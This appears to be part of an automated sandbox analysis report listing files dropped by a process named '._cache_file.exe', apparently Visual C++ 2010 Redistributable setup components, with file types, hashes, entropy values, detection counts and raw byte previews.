                                                                                            SHA-512:97FDBDD6EFADBFB08161D8546299952470228A042BD2090CD49896BC31CCB7C73DAB8F9DE50CDAF6459F7F5C14206AF7B90016DEEB1220943D61C7324541FE2C
                                                                                            Malicious:false
                                                                                            Preview:..............h.......(....... .................................................................................................... ............................................$.$ ..0./...........................{.{............ ...........<.;..........................................C.BA.@O.N...............{.{...~.~..................G.F..................................................................................................._.]..........................................n.lg.en.l..........................................p.n...............................................................................................................................................................................................................................................................................................................G.......................................G..........

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Graphics\Rotate7.ico

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):894
                                                                                            Entropy (8bit):2.4948009720290445
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:kRKIekllisUriJ2IP+eX8iDml8mS8+hlxllwqlllkg2klHYdpqnHp/p5c:p8os0iieX8iNVHX//x2sHYdoHRp5c
                                                                                            MD5:FB4DFEBE83F554FAF1A5CEC033A804D9
                                                                                            SHA1:6C9E509A5D1D1B8D495BBC8F57387E1E7E193333
                                                                                            SHA-256:4F46A9896DE23A92D2B5F963BCFB3237C3E85DA05B8F7660641B3D1D5AFAAE6F
                                                                                            SHA-512:3CAEB21177685B9054B64DEC997371C4193458FF8607BCE67E4FBE72C4AF0E6808D344DD0D59D3D0F5CE00E4C2B8A4FFCA0F7D9352B0014B9259D76D7F03D404
                                                                                            Malicious:false
                                                                                            Preview:..............h.......(....... ....................................................................................................G.F..........................................H.GG.FX.V..............................).(.........G.F.........i.g..................+.*%.$5.4...............n.ln.l{.y.................. .......................u.s............................................................................................................................................................~.~...~.~.................................................................................................................................................................................................................................................................................................................................................G.......................................G..........

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Graphics\Rotate8.ico

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):894
                                                                                            Entropy (8bit):2.513882730304912
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:pPv1OuTerb53mpOBfXjQuZfKWpIXE1D6HRp5c:91OEerb53eUQsflpIP4
                                                                                            MD5:D1C53003264DCE4EFFAF462C807E2D96
                                                                                            SHA1:92562AD5876A5D0CB35E2D6736B635CB5F5A91D9
                                                                                            SHA-256:5FB03593071A99C7B3803FE8424520B8B548B031D02F2A86E8F5412AC519723C
                                                                                            SHA-512:C34F8C05A50DC0DE644D1F9D97696CDB0A1961C7C7E412EB3DF2FD57BBD34199CF802962CA6A4B5445A317D9C7875E86E8E62F6C1DF8CC3415AFC0BD26E285BD
                                                                                            Malicious:false
                                                                                            Preview:..............h.......(....... ....................................................................................................g.e..........................................g.eg.ew.u..............................F.E.........g.e..............................E.DA.@P.O..........................................:.9......................................................................................&.%.........................................+.* ..+.*..................................................................................................................................................{.{.......................................................................................~.~...{.{..............................................................................................................................................G.......................................G..........

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Graphics\Save.ico

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):1150
                                                                                            Entropy (8bit):4.824239610266714
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Br5ckw0Pce/WPv42lPpJ2/BatY9Y4ollEKeKzn:h6kPccWPQS2UtEYFEKeu
                                                                                            MD5:7D62E82D960A938C98DA02B1D5201BD5
                                                                                            SHA1:194E96B0440BF8631887E5E9D3CC485F8E90FBF5
                                                                                            SHA-256:AE041C8764F56FD89277B34982145D16FC59A4754D261C861B19371C3271C6E5
                                                                                            SHA-512:AB06B2605F0C1F6B71EF69563C0C977D06C6EA84D58EF7F2BAECBA566D6037D1458C2B58E6BFD70DDEF47DCCBDEA6D9C2F2E46DEA67EA9E92457F754D7042F67
                                                                                            Malicious:false
                                                                                            Preview:............ .h.......(....... ..... .....@........................................................................................klT.de..UV..RS..OP..MM..JJ..GG..DD..AA.x;<.x;<.r99.n67..........kl......D$.G2!...............VMH..>3..=6..91.r99..........op.........q[K.G<4..xh...........s..A5..B<..=5.x;<..........uv...........q[K.....G<4..........tg..KC..ID..B<.}>>..........{|.............q[K.q[K.q[K.q[K.vbR.}j[..VT..OL..ID..AA...............................yz..qr..kl..]\..VT..PL..DD.....................c`..^V..XK..R?..M4..G(..A...;...]\..VT..GG................fg.................................;...]\..JJ................mn..................................A...gg..MM................vw..................................G(..qr..OP..................................................M4..yz..RS..................................................R?.g33..UV....................................................XK..XY..XY..................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Graphics\Setup.ico

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 12 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):36710
                                                                                            Entropy (8bit):5.3785085024370805
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:IXcWz9GU46B4riEzg8CKcqxkk63gBh6wSphnBcI/ObMFp2rOebgcjTQcho:IMWQ2Bf8qqxMQP8pc4XessTJo
                                                                                            MD5:3D25D679E0FF0B8C94273DCD8B07049D
                                                                                            SHA1:A517FC5E96BC68A02A44093673EE7E076AD57308
                                                                                            SHA-256:288E9AD8F0201E45BC187839F15ACA79D6B9F76A7D3C9274C80F5D4A4C219C0F
                                                                                            SHA-512:3BDE668004CA7E28390862D0AE9903C756C16255BDBB3F7E73A5B093CE6A57A3165D6797B0A643B254493149231ACA7F7F03E0AF15A0CBE28AFF02F0071EC255
                                                                                            Malicious:false
                                                                                            Preview:..............(...............h...............h...V... .............. .............. ..........N...00......h...."..00..........^)..00...........8........ .h....T.. .... ......Y..00.... ..%...i..(....... ....................................................................................................w......x......................x..ww...........h...............................w.....w.x..........x................xwvwg.................................................................(....... ...................................jO:.mS?.qWD.v\I.|cP..kX..q_..sa..yg..{j...p..nh..pj..uo..|u..xq..|r..|u..rx..zy..|w.}.y...q...d...y...{......S...]..d..i..r..|...j..j...y...e...k...l..q...y...~...v...y..s..s..m...m...l...n...k...t...l..........................................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Graphics\SysReqMet.ico

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):1150
                                                                                            Entropy (8bit):5.038533294442847
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MuoBP5lj49s9NRDe4LakKcTM8cv99uGzMN:MlFH3/Ri4LaN3q
                                                                                            MD5:661CBD315E9B23BA1CA19EDAB978F478
                                                                                            SHA1:605685C25D486C89F872296583E1DC2F20465A2B
                                                                                            SHA-256:8BFC77C6D0F27F3D0625A884E0714698ACC0094A92ADCB6DE46990735AE8F14D
                                                                                            SHA-512:802CC019F07FD3B78FCEFDC8404B3BEB5D17BFC31BDED90D42325A138762CC9F9EBFD1B170EC4BBCCCF9B99773BD6C8916F2C799C54B22FF6D5EDD9F388A67C6
                                                                                            Malicious:false
                                                                                            Preview:............ .h.......(....... ..... .....@..........................................M...........S...........................................q.......................z...................................;........q.c.P.K.|.}............C....................................;.!......................................................Ry,.*w..!.............-.........................................6b..8v................ .+.@............#....................4u..;a..............H.<.........=.C.............................&y..x.e.................$}......................................<.).........\.A............}..................................[.R.}.n.Z.C.y.Y.k.L............. q..............................t.s............r...k.........]{G..............................................y.`.z.h.a.N.e.P...............................................~.q._.J...............................8....................t.p..................?..................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Graphics\SysReqNotMet.ico

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):1150
                                                                                            Entropy (8bit):5.854644771288791
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:u2iVNINssNQhYMEyfCHWZZ7rTRrbWjcyuE:uDW871fdZ1lbWjME
                                                                                            MD5:EE2C05CC9D14C29F586D40EB90C610A9
                                                                                            SHA1:E571D82E81BD61B8FE4C9ECD08869A07918AC00B
                                                                                            SHA-256:3C9C71950857DDB82BAAB83ED70C496DEE8F20F3BC3216583DC1DDDA68AEFC73
                                                                                            SHA-512:0F38FE9C97F2518186D5147D2C4A786B352FCECA234410A94CC9D120974FC4BE873E39956E10374DA6E8E546AEA5689E7FA0BEED025687547C430E6CEFFABFFB
                                                                                            Malicious:false
                                                                                            Preview:............ .h.......(....... ..... .....@....................................../..F..........!....n....d..................................;.............,+..AB..UV..XZ...1.....S......................U.....................EE..\[..rr......NP.....^..............<s.....................!.$)..AC..jj..ww..{{..57.....4........01.................H..........N?8;..[[..ba..`_..TU....L.......bj]^..QP.........:..........)N#&..>=..GG..HI..IJ..EE..!#......24..mm..hh..,.............+N........)(..*-.....{-...-,........ SPS..zy..qr....qq......0NCE..33..%%........ZJ...."$..0/../1....?qRU............W}..)A]^..rr..qq..Y[...._z........CE..RQ..AC....8`79.........SU..ab......||..ef....ey...........QZ[..ZZ..=?.....(...d....................pr.....H............IK..jj..fg..*,..........]_..................[y.......(..:VQS..{z..ut..ab....'H...........?................||..ef..jk..................$%d....................W....................................*,n.............................HI......................WY

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Graphics\stop.ico

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 6 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):10134
                                                                                            Entropy (8bit):6.016582854640062
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:uC1kqWje1S/f1AXa0w+2ZM4xD02EuZkULqcA0zjrpthQ2Ngms9+LmODclhpjdfLt:JkqAFqroMS9lD9Ngr9+m7bxpXHT5ToYR
                                                                                            MD5:5DFA8D3ABCF4962D9EC41CFC7C0F75E3
                                                                                            SHA1:4196B0878C6C66B6FA260AB765A0E79F7AEC0D24
                                                                                            SHA-256:B499E1B21091B539D4906E45B6FDF490D5445256B72871AECE2F5B2562C11793
                                                                                            SHA-512:69A13D4348384F134BA93C9A846C6760B342E3A7A2E9DF9C7062088105AC0B77B8A524F179EFB1724C0CE168E01BA8BB46F2D6FAE39CABE32CAB9A34FC293E4A
                                                                                            Malicious:false
                                                                                            Preview:...... ..........f...........(...N... ..........v...........h....... .... ............... .h....#..(... ...@......................................................................................................wwx...........w....w.........x....x.........x.y.......................p..............x.........q.......p.........q.................xy...........q.......................p.............y..................x.y..............y.y.............yyy.........S........x..........yy.............x.yyyx......................Q.8.........x..............y....qy.p...y.....x.....p........y....9.....y....yy..yx.......y..yyyw..p.....y.yyyyy................x.p........y.yy..........x...x............x.................wwx.....................?...................................................................................................?............(....... ..................................................................................................ww.....w..........xx..x........x....p........xy

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Graphics\warn.ico

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 6 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):10134
                                                                                            Entropy (8bit):4.3821301214809045
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:USAk9ODMuYKFfmiMyT4dvsZQl+g8DnPUmXtDV3EgTtc:r9wM7pyEBlcgssmXpVUgJc
                                                                                            MD5:B2B1D79591FCA103959806A4BF27D036
                                                                                            SHA1:481FD13A0B58299C41B3E705CB085C533038CAF5
                                                                                            SHA-256:FE4D06C318701BF0842D4B87D1BAD284C553BAF7A40987A7451338099D840A11
                                                                                            SHA-512:5FE232415A39E0055ABB5250B120CCDCD565AB102AA602A3083D4A4705AC6775D45E1EF0C2B787B3252232E9D4673FC3A77AAB19EC79A3FF8B13C4D7094530D2
                                                                                            Malicious:false
                                                                                            Preview:...... ..........f...........(...N... ..........v...........h....... .... ............... .h....#..(... ...@................................................................................................................................................................wwwww.....wwww...................3333333333338...{....3s.....x...{....0G;.............0.;...7.........33....8.....{...33..............0....7...............8.......{....;.............0.;.............0...8...........4...............wu;.............ww;.............ww;?...........;ww;.............7w................................8.............{...................................................................................................................................................................?...?..................................................?...?.........(....... ........................................................................................................333333;...............8.........;........

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\ParameterInfo.xml

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (314), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):9752
                                                                                            Entropy (8bit):3.5715293676289863
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:gCEIVvHBZC30jzG2aks2G2XVEP2G2KQ6G2nCw+KFl:JFnGMGZeGPGYCrKFl
                                                                                            MD5:03E01A43300D94A371458E14D5E41781
                                                                                            SHA1:C5AC3CD50FAE588FF1C258EDAE864040A200653C
                                                                                            SHA-256:19DE712560E5A25C5D67348996E7D4F95E8E3DB6843086F52CB7209F2098200A
                                                                                            SHA-512:E271D52264FF979AE429A4053C945D7E7288F41E9FC6C64309F0AB805CEC166C825C2273073C4EF9CA5AB33F00802457B17DF103A06CBC35C54642D146571BBB
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .S.e.t.u.p.V.e.r.s.i.o.n.=.".1...0.".>..... . .<.U.I. .D.l.l.=.".S.e.t.u.p.U.i...d.l.l.". .N.a.m.e.=.".M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.0. . .x.6.4. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .S.e.t.u.p.". .V.e.r.s.i.o.n.=.".1.0...0...3.0.3.1.9.". ./.>..... . .<.C.o.n.f.i.g.u.r.a.t.i.o.n.>..... . . . .<.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . . . .<.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h. .N.a.m.e.=.".c.r.e.a.t.e.l.a.y.o.u.t.". ./.>..... . . . .<./.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . .<.U.s.e.r.E.x.p.e.r.i.e.n.c.e.D.a.t.a.C.o.l.l.e.c.t.i.o.n. .P.o.l.i.c.y.=.".U.s.e.r.C.o.n.t.r.o.l.l.e.d.". ./.>..... . . . .

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):78152
                                                                                            Entropy (8bit):6.011592088917562
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:sYNItbBL5NWiiESc0exWZnqxMQP8ZOs0JD9rHUq:sYNAB9NWTZctc/gBJ9oq
                                                                                            MD5:006F8A615020A4A17F5E63801485DF46
                                                                                            SHA1:78C82A80EBF9C8BF0C996DD8BC26087679F77FEA
                                                                                            SHA-256:D273460AA4D42F0B5764383E2AB852AB9AF6FECB3ED866F1783869F2F155D8BE
                                                                                            SHA-512:C603ED6F3611EB7049A43A190ED223445A9F7BD5651100A825917198B50C70011E950FA968D3019439AFA0A416752517B1C181EE9445E02DA3904F4E4B73CE76
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.................j.}.....].v.....h.w.....\.H...v.e.|.......B.....h.~.....Y.|.....].~.....m.~.....l.~.....k.~...Rich............PE..L......K.........."......f...........+............@..........................P............@...... ..................pu..x...Tp..<.......................H....@...... ................................(..@............................................text....e.......f.................. ..`.data................j..............@....rsrc................v..............@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\SetupEngine.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):807256
                                                                                            Entropy (8bit):6.357664904941565
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:GS62nlYAqK/AitUgiuVQk/oifPNJIkjbSTzR8NmsBJj:GS62nlYAltBjPNJIkHST18QsBJ
                                                                                            MD5:84C1DAF5F30FF99895ECAB3A55354BCF
                                                                                            SHA1:7E25BA36BCC7DEED89F3C9568016DDB3156C9C5A
                                                                                            SHA-256:7A0D281FA802D615EA1207BD2E9EBB98F3B74F9833BBA3CB964BA7C7E0FB67FD
                                                                                            SHA-512:E4FB7E4D39F094463FDCDC4895AB2EA500EB51A32B6909CEC80A526BBF34D5C0EB98F47EE256C0F0865BF3169374937F047BF5C4D6762779C8CA3332B4103BE3
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................&......&.......R.....z.....O.....{......B...........O.....~.....J.....K.....L....Rich...........................PE..L......K.........."!................Y...............................................;.....@.....................................h....................:..X...............................................@............................................text............................... ..`.data...8...........................@....rsrc................f..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\SetupUi.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):295248
                                                                                            Entropy (8bit):6.262127887617593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:/LTVUK59JN+C0iy4Ww8oBcPFIOrvHvr8QDZHAAKWiIHT6llN1QkvQZaiionv5y/y:HOoMFrz8ygAKWiiIyKf73w
                                                                                            MD5:EB881E3DDDC84B20BD92ABCEC444455F
                                                                                            SHA1:E2C32B1C86D4F70E39DE65E9EBC4F361B24FF4A1
                                                                                            SHA-256:11565D97287C01D22AD2E46C78D8A822FA3E6524561D4C02DFC87E8D346C44E7
                                                                                            SHA-512:5750CEC73B36A3F19BFB055F880F3B6498A7AE589017333F6272D26F1C72C6F475A3308826268A098372BBB096B43FBD1E06E93EECC0A81046668228BC179A75
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............I...I...I..bI...I..WI...I..cI..I..ZI...I...IG..I..WI...I..fI...I..RI...I..SI...I..TI...IRich...I................PE..L......K.........."!................................................................yq....@..........................................P...............j..P....`..0?..................................`z..@............................................text............................... ..`.data....Q.......4..................@....rsrc........P......................@..@.reloc...T...`...V..................@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\SetupUi.xsd

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (335), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):30120
                                                                                            Entropy (8bit):4.990211039591874
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:hlzLm8eYhsPs05F8/ET/chT+cxcW8G2P4oeTMC:1wchT+cxcDm
                                                                                            MD5:2FADD9E618EFF8175F2A6E8B95C0CACC
                                                                                            SHA1:9AB1710A217D15B192188B19467932D947B0A4F8
                                                                                            SHA-256:222211E8F512EDF97D78BC93E1F271C922D5E91FA899E092B4A096776A704093
                                                                                            SHA-512:A3A934A8572FF9208D38CF381649BD83DE227C44B735489FD2A9DC5A636EAD9BB62459C9460EE53F61F0587A494877CD3A3C2611997BE563F3137F8236FFC4CA
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema".. xmlns="http://schemas.microsoft.com/SetupUI/2008/01/imui".. xmlns:imui="http://schemas.microsoft.com/SetupUI/2008/01/imui".. targetNamespace="http://schemas.microsoft.com/SetupUI/2008/01/imui".. elementFormDefault="qualified"..attributeFormDefault="unqualified"..>.... <xs:annotation>.. <xs:documentation>.. Copyright (c) Microsoft Corporation. All rights reserved... Schema for describing DevDiv "Setup UI Info".. </xs:documentation>.. </xs:annotation>.... <xs:element name="SetupUI">.. <xs:annotation>.. <xs:documentation>specifies UI dll, and lists of MSIs MSPs and EXEs</xs:documentation>.. </xs:annotation>.. <xs:complexType>.. <xs:sequence>.. <xs:choice>.. <xs:element ref="UI" minOccurs="1" maxOccurs="1"></xs:element>.. <xs:element ref="Strings" minOccurs="1" maxOccurs="1"></xs:element>..

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\SplashScreen.bmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PC bitmap, Windows 3.x format, 200 x 200 x 8, image size 40000, resolution 3779 x 3779 px/m, cbSize 41078, bits offset 1078
                                                                                            Category:dropped
                                                                                            Size (bytes):41078
                                                                                            Entropy (8bit):0.3169962482036715
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:SgrNa0EfB4elU+jB+rQXJH4+Cs77hIfVHCv4ToqIzgPc8wcKHL+3:3pa0e4YjB5vAHk4E7zgPcDc53
                                                                                            MD5:43B254D97B4FB6F9974AD3F935762C55
                                                                                            SHA1:F94D150C94064893DAED0E5BBD348998CA9D4E62
                                                                                            SHA-256:91A21EBA9F5E1674919EE3B36EFA99714CFB919491423D888CB56C0F25845969
                                                                                            SHA-512:46527C88F0AED25D89833B9BE280F5E25FFCEAE6BC0653054C8B6D8EBE34EBA58818A0A02A72BD29279310186AC26D522BBF34191FBDE279A269FC9DA5840ACC
                                                                                            Malicious:false
                                                                                            Preview:BMv.......6...(...................@.......................{7...>...h?..D...N...K..........xE..._#..q..T...X...Q...[..._...c...j....>.!....f...v...r...."..v....0....... ..........4..I.........[...}..............j.............................................................................................................i......................@>1.......................................................o...u...u...z...z...~............................................................................................................................................................................{...~.................................................................................................................yw`......................................................................................................................................................//'...........................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Strings.xml

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):14246
                                                                                            Entropy (8bit):3.70170676934679
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:VAZo71GHY3vqaqMnYfHHVXIHjfBHwnwXCa+F:VAB
                                                                                            MD5:332ADF643747297B9BFA9527EAEFE084
                                                                                            SHA1:670F933D778ECA39938A515A39106551185205E9
                                                                                            SHA-256:E49545FEEAE22198728AD04236E31E02035AF7CC4D68E10CBECFFD08669CBECA
                                                                                            SHA-512:BEA95CE35C4C37B4B2E36CC1E81FC297CC4A8E17B93F10423A02B015DDB593064541B5EB7003560FBEEE512ED52869A113A6FB439C1133AF01F884A0DB0344B0
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p.U.I. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". ..... . . . . . . . . .x.m.l.n.s.:.i.m.u.i.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .>..... . .<.S.t.r.i.n.g.s.>..... . . . .<.!.-.-. .R.e.f.l.e.c.t.i.v.e. .p.r.o.p.e.r.t.y. .p.a.g.e. .-.-.>..... . . . .<.I.D.S._.C.A.P.T.I.O.N._.F.O.R.M.A.T._.1.S.>.#.(.l.o.c...i.d.s._.c.a.p.t.i.o.n._.f.o.r.m.a.t._.1.s.).<./.I.D.S._.C.A.P.T.I.O.N._.F.O.R.M.A.T._.1.S.>..... . . . .<.I.D.S._.I.S._.R.E.A.L.L.Y._.C.A.N.C.E.L.>.#.(.l.o.c...i.d.s._.i.s._.r.e.a.l.l.y._.c.a.n.c.e.l.).<./.I.D.S._.I.S._.R.E.A.L.L.Y._.C.A.N.C.E.L.>......... . . . .<.!.-.-. .S.y.s.t.e.m. .R.e.q.u.i.r.e.m.e.n.t.s. .p.a.g.e. .-.-.>..... . . . .<.S.Y.S.R.E.Q.P.A.G.E._.R.E.Q.U.I.R.E.D._.A.N.D._.A.V.A.I.L.A.B.L.E._.D.I.S.K._.S.P.A.C.E.>.#.(.l.o.c...s.y.s.r.e.q.

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\UiInfo.xml

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):36342
                                                                                            Entropy (8bit):3.0937266645670003
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:S4UR0d5v0SguJQvFQXvDINJh6Fmhvk71sO0Nep3UL9Eu+dOtOcOdOjT5fuPkfuS:S4UR0d5v0QYQLIN/6Fmhvk71sO0Nep3q
                                                                                            MD5:812F8D2E53F076366FA3A214BB4CF558
                                                                                            SHA1:35AE734CFB99BB139906B5F4E8EFBF950762F6F0
                                                                                            SHA-256:0D36A884A8381778BEA71F5F9F0FC60CACADEBD3F814679CB13414B8E7DBC283
                                                                                            SHA-512:1DCC3EF8C390CA49FBCD50C02ACCD8CC5700DB3594428E2129F79FEB81E4CBBEEF1B4A10628B2CD66EDF31A69ED39CA2F4E252AD8AA13D2F793FCA5B9A1EAF23
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p.U.I. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .x.m.l.n.s.:.i.m.u.i.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .>..... . .<.U.I.>......... . . . .<.R.e.s.o.u.r.c.e.D.l.l.>.S.e.t.u.p.R.e.s.o.u.r.c.e.s...d.l.l.<./.R.e.s.o.u.r.c.e.D.l.l.>..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.H.i.d.e./.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>......... . . . .<.L.C.I.D.H.i.n.t.s.>..... . . . . . .<.L.C.I.D.H.i.n.t.>..... . . . . . . . .<.R.e.g.K.e.y.>.H.K.C.U.\.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.V.i.s.u.a.l.S.t.u.d.i.o.\.9...0.\.G.e.n.e.r.a.l.<./.R.e.g.K.e.y.>..... . . . . . . . .<.R.e.g.V.a.l.u.e.N.a.m.e.>.U.I.L.a.n.g.u.a.g.e._.f.a.k.e.<./.R.e.g.V.a.l.u.e.N.a.m.e.>..... . . . . . .<./.L.C.I.D.H.i.n.t.>..... . . . . . .<.L.C.I.D.H.i.n.t.>..... . . . . .

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\header.bmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PC bitmap, Windows 3.x format, 49 x 49 x 24, image size 7254, resolution 2834 x 2834 px/m, cbSize 7308, bits offset 54
                                                                                            Category:dropped
                                                                                            Size (bytes):7308
                                                                                            Entropy (8bit):3.7864255453272464
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:9L9GXidTgX2bqxIS0SRosEYYgJSIf4pKTg7pDdEAeObh8EWu:R/Y2bq10Q/EY1sK8M4bb
                                                                                            MD5:3AD1A8C3B96993BCDF45244BE2C00EEF
                                                                                            SHA1:308F98E199F74A43D325115A8E7072D5F2C6202D
                                                                                            SHA-256:133B86A4F1C67A159167489FDAEAB765BFA1050C23A7AE6D5C517188FB45F94A
